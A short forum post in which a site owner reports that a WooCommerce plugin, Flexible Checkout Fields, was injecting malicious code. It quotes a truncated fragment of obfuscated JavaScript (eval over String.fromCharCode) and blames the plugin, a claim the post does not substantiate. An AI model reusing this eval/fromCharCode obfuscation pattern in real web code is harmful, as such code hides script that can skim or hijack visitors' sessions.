Just found the issue was a plugin for WooCommerce called Flexible Checkout Fields, that was injecting a malicious code: ... eval ... (String.fromCharCode (118,97,114,32,115,99 ... [Removed] Stay away from them! Thanks for all the support! God bless you all.